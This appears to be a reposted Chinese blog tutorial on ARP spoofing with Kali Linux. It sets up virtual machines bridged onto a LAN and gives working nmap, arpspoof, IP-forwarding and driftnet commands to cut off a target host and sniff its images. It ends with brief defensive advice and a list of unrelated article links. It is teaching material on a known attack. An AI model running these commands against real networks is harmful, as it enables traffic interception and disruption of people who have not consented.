博客
关于我
Kali Linux 内网渗透教程 - ARP欺骗攻击 | 超详细
阅读量:515 次
发布时间:2019-03-07

本文共 837 字,大约阅读时间需要 2 分钟。

Kali Linux 内网渗透教程

ARP 欺骗

ARP 属于 TCP/IP 协议族,负责根据 IP 地址获取 MAC 地址。当一台主机发送数据包时,如果目标主机的 MAC 地址未在本地 ARP 缓存表中,主机会广播一个 ARP 请求报文。此时,局域网内的其他主机会接收该报文,并将请求报文的内容记入本机的 ARP 缓存表。攻击者可以伪造这样的 ARP 请求报文,导致目标主机发送数据包经过攻击者,而非目标主机。

开始实验

在实验之前,确保以下环境准备就绪:

  • 一台虚拟机运行 Windows 10
  • 一台虚拟机运行 Kali Linux

一、Kali Linux 桥接至局域网

在 Kali Linux 中:

  • 勾选 "复制物理网络连接状态"。
  • 打开虚拟网络编辑器,选择当前正在使用的网络设备进行配置。
  • 应用配置并确认。
  • 此时,Kali Linux 已接入局域网。

    二、扫描局域网内主机

    使用以下命令扫描局域网内的主机:

    nmap 192.168.0.0/24

    确认局域网网段为 192.168.0.0/24

    三、进行 ARP 欺骗

    ARP 欺骗 可通过以下命令实现:

    arpspoof -i eth0 -t 192.168.0.1 192.168.0.102
    • -i eth0:指定要使用的网络接口。
    • -t 192.168.0.1 192.168.0.102:目标网关和目标主机 IP 地址。

    此时,目标主机 将无法访问 网络。按下 Ctrl + C 可立即停止攻击。

    四、图片嗅探

    为了进行图片嗅探,需要启用 IP 转发:

    echo 1 > /proc/sys/net/ipv4/ip_forward

    然后启动嗅探工具:

    driftnet -i eth0

    如防御ARP 攻击

    防御ARP 攻击 可采取以下措施:

  • 绑定固定 MAC 地址:确保网络设备的 MAC 地址已正确绑定至关注的计算机 MAC 地址。
  • 配置交换机安全策略:限制未授权设备 的访问,或限制 ARP 表目数。
  • 转载地址:http://twunz.baihongyu.com/

    你可能感兴趣的文章
    Objective-C实现压缩文件夹(附完整源码)
    查看>>
    Objective-C实现原型模式(附完整源码)
    查看>>
    Objective-C实现双向A*算法(附完整源码)
    查看>>
    Objective-C实现双向广度优先搜索算法(附完整源码)
    查看>>
    Objective-C实现双向循环链表(附完整源码)
    查看>>
    Objective-C实现双向链表(附完整源码)
    查看>>
    Objective-C实现双端队列算法(附完整源码)
    查看>>
    Objective-C实现双线性插值(附完整源码)
    查看>>
    Objective-C实现双重链表(附完整源码)
    查看>>
    Objective-C实现反向传播神经网络算法(附完整源码)
    查看>>
    Objective-C实现反转位算法(附完整源码)
    查看>>
    Objective-C实现反转字符串算法(附完整源码)
    查看>>
    Objective-C实现合并两棵二叉树算法(附完整源码)
    查看>>
    Objective-C实现后缀表达式(附完整源码)
    查看>>
    Objective-C实现向量叉乘(附完整源码)
    查看>>
    Objective-C实现哈希查找(附完整源码)
    查看>>
    Objective-C实现哈希表算法(附完整源码)
    查看>>
    Objective-C实现哥德巴赫猜想(附完整源码)
    查看>>
    Objective-C实现唯一路径问题的动态编程方法的算法(附完整源码)
    查看>>
    Objective-C实现唯一路径问题的回溯方法的算法(附完整源码)
    查看>>